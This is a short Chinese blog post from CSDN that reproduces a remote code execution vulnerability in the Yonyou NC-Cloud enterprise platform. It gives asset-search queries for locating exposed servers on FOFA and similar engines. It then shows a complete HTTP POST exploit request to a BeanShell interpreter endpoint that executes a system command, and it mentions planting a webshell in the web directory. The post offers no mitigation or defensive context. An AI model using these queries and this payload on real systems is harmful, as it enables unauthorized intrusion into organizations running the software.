用友-NC-Cloud远程代码执行漏洞

赤赤亻夹

已于 2023-08-28 16:19:16 修改

阅读量325

点赞数

分类专栏：漏洞复现文章标签：安全

于 2023-08-28 16:17:47 首次发布

本文链接：https://blog.csdn.net/u011424519/article/details/132541247

版权

漏洞复现专栏收录该内容

1 篇文章 0 订阅

订阅专栏

一、资产搜索

FOFA：app=“用友-NC-Cloud”
鹰图：web.title=“大型企业数字化平台”
Hunter：web.body=“uap/rbac”

二、漏洞复现

通过接口写马，把马写到web目录：webapps/nc_web/

POST /0811.jsp?error=bsh.Interpreter HTTP/1.1
Host: xxx.xxx.xxx.xxx:xxxx
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: cookiets=1681785470496; JSESSIONID=33989F450B1EA57D4D3ED07A343770FF.server
If-None-Match: W/"1571-1589211696000"
If-Modified-Since: Mon, 11 May 2020 15:41:36 GMT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 98

cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("whoami").getInputStream())